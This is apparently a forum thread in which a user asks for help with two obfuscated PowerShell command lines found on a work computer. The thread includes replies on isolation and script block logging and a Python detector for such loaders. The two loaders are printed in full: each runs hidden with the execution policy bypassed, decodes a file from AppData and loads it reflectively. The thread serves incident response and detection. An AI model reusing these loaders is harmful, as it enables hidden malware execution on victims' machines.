Unknown Script in our Environment

We detected the scripts below on one of our computers this morning. I’m pretty sure they are malicious based on how they look and what they appear to be doing. The folders they reference contain dozens of files with random file names and extensions. They also appear to be tied to some startup process or program.

Where I fall short is understanding what these scripts are actually doing, and I’m hoping I can get some help. I understand that the scripts are running as hidden, setting the execution policy to bypass, and then calling a script block. After that it seems to either call, create, or manipulate objects and then connect to files.

"PowerShell.exe" -windOWStYLe hIddEN -eP BYpASs -commAnD "[sYsTem.refLEcTion.ASsEmBly]::LoAD({$a7118bfda6d4b8af0cb14447ec219=NEW-ObJeCt SYStEm.IO.MEMorySTreAm(, $ArGS[0]);$abab1a4d8b348e881f740374eb4eb=neW-oBject SystEM.IO.mEmoRYsTReAM;$a41c73041894c69d901cdb652dcd8=NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM $a7118bfda6d4b8af0cb14447ec219, ([IO.COmprESsIon.comPReSSioNmODE]::DecOmPrEss);$a41c73041894c69d901cdb652dcd8.coPyTO($abab1a4d8b348e881f740374eb4eb);$a41c73041894c69d901cdb652dcd8.CLose();$a7118bfda6d4b8af0cb14447ec219.CLOse();reTuRN $abab1a4d8b348e881f740374eb4eb.toaRRay();}.inVoKE([SYsteM.Io.fiLE]::REadALlByteS('C:\Users\jdoe\AppData\Roaming\aDobe\TefpYOdEvcLAk\ZeoLwxHmUPAuRViqY.MiOzuJQlZGYeaEq')));[abe9358f57541eab841f83b9a944d.a3e8233974540f924b73c817a287c]::ac7f32ed5624da88d2fee302b2b18()"

"PowerShell.exe" -wINDoWStYLe hIDDEN -eP BypasS -comMand "$a7997fcd41e4a3b768a6bf953e6cc='QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBqKGhAcjl3OV4wS09mQHZnWHVAd0teKUB0JV5QXlBqZXhAVU19Y0B1LUg3QFY+ZDBeMHVfUS0/O0ZzdyFpWVVxQE1Ad2tZbkB3fmpHPlg0ZkFnU0BFb3NHKitvbVotaC1rQ1REKG9QZVY2bld2UVN4fllmamdOKld6eHhlT3luZWVga3JTcTFkd2VxeChqUGpEQnFWbHgwal97a2p5entTdmxKS2pLeEFCXnJoVnpHIW9BWiYwelc=';$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES('C:\Users\jdoe\AppData\Roaming\mIcROSoFt\YOSEmKhDtVvawIMuCQk\dZBIhKAtEGYsg.qNyFOJtMwvWmEfZ');fOr($aa9ae30d8304f0b78e86582ea3b85=0;$aa9ae30d8304f0b78e86582ea3b85 -Lt $a77abf52b7d407808df1ba9745490.COUNT;){FOr($a439a9ddd664bfbdee23d2c082e8b=0;$a439a9ddd664bfbdee23d2c082e8b -lT $a7997fcd41e4a3b768a6bf953e6cc.lEnGtH;$a439a9ddd664bfbdee23d2c082e8b++){$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85]=$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$a439a9ddd664bfbdee23d2c082e8b];$aa9ae30d8304f0b78e86582ea3b85++;IF($aa9ae30d8304f0b78e86582ea3b85 -ge $a77abf52b7d407808df1ba9745490.cOuNT){$a439a9ddd664bfbdee23d2c082e8b=$a7997fcd41e4a3b768a6bf953e6cc.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);[aa1d6f4e60d4f0b9a10f9031f4877.af35bb34041454ba3d18c1a462992]::a2be604cdf64df868f7a43ea5911b()"

Any help would be appreciated,
James

James,
Welcome to the forum.

I assume you’ve already separated the computer you found these scripts on from your network!? If not, you should do so now.

An easy way to find out what that obfuscated code does is to enable PowerShell script block logging and run it.

Here are some blog posts and documentation pages on this topic:

Hunting for Malicious PowerShell using Script Block Logging | Splunk.

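As an added example (not from this thread or any of the posters), a Python triage check for command lines like the two above as they show up in process-creation or script block logs: it scores the indicators that are visible in both loaders (hidden window, policy bypass, reflective assembly load, gzip inflate, XOR loop, long key literal, random hex variable names) and pulls out the on-disk files the script reads, which is what you would want to collect first. The condensed samples, placeholder directory names and thresholds are my own construction.

```python
import re
# Added example, not from the thread: a triage scorer for PowerShell command lines as
# they appear in process-creation or script block (Event ID 4104) logs. The indicators
# are the ones visible in the two loaders above; IGNORECASE handles the random casing.
INDICATORS = {
    "hidden_window":      r"-w[a-z]*\s+hidden",          # -w, -win, -windowstyle prefixes
    "exec_policy_bypass": r"-e[a-z]*\s+bypass",          # -e, -ep, -ex, -executionpolicy
    "reflective_load":    r"\[system\.reflection\.assembly\]::load\(",  # in-memory .NET load
    "gzip_decompress":    r"gzipstream.*decompress",     # loader 1: inflate file, then load
    "xor_loop":           r"-bxor",                      # loader 2: byte-wise XOR with a key
    "long_key_literal":   r"'[A-Za-z0-9+/=]{40,}'",      # loader 2: the embedded key string
    "random_hex_vars":    r"\$a[0-9a-f]{24,}",           # $a + long hex run as variable names
}
PATH_RE = re.compile(r"readallbytes\(\s*'([^']+)'\s*\)", re.IGNORECASE)

def analyze(cmdline: str) -> dict:
    """Return the indicator names that matched and the files the script reads from disk."""
    cmd = cmdline.translate(str.maketrans("\u2018\u2019\u201c\u201d", "''\"\""))  # pasted smart quotes
    hits = [name for name, rx in INDICATORS.items() if re.search(rx, cmd, re.IGNORECASE)]
    return {"hits": hits, "files": PATH_RE.findall(cmd)}

def should_alert(cmdline: str, threshold: int = 3) -> bool:
    """Hidden window or policy bypass alone is common admin tooling; a reflective
    load combined with decoding indicators is a staged loader worth alerting on."""
    hits = set(analyze(cmdline)["hits"])
    return "reflective_load" in hits and len(hits) >= threshold

# Constructed samples: condensed versions of the two loaders from the post (random
# directory names replaced by placeholders) plus a benign administrative invocation.
LOADER_GZIP = (
    'PowerShell.exe -windOWStYLe hIddEN -eP BYpASs -commAnD "[sYsTem.refLEcTion.ASsEmBly]::LoAD({'
    "$a7118bfda6d4b8af0cb14447ec219=NEW-ObJeCt SYStEm.IO.MEMorySTreAm(, $ArGS[0]);"
    "$a41c73041894c69d901cdb652dcd8=NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM "
    "$a7118bfda6d4b8af0cb14447ec219, ([IO.COmprESsIon.comPReSSioNmODE]::DecOmPrEss);"
    "}.inVoKE([SYsteM.Io.fiLE]::REadALlByteS("
    "'C:\\Users\\jdoe\\AppData\\Roaming\\aDobe\\STAGE1DIR\\stage1.bin')))\""
)
LOADER_XOR = (
    'PowerShell.exe -wINDoWStYLe hIDDEN -eP BypasS -comMand "'
    "$a7997fcd41e4a3b768a6bf953e6cc='QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBq=';"
    "$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES("
    "'C:\\Users\\jdoe\\AppData\\Roaming\\mIcROSoFt\\STAGE2DIR\\stage2.bin');"
    "fOr($i=0;$i -Lt $a77abf52b7d407808df1ba9745490.COUNT;$i++){$a77abf52b7d407808df1ba9745490[$i]="
    "$a77abf52b7d407808df1ba9745490[$i] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$i]};"
    '[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);"'
)
BENIGN = "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"

if __name__ == "__main__":
    for label, sample in (("gzip loader", LOADER_GZIP), ("xor loader", LOADER_XOR), ("benign", BENIGN)):
        print(label, should_alert(sample), analyze(sample))
```

The extracted file paths are the artifacts to pull from the host before cleaning it; with script block logging on, the same regexes can run over the decoded 4104 event text instead of the raw command line.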

We ended up finding that this was caused by malware, potentially Jupyter. Needless to say the PC has been cleaned and I have a new favorite user.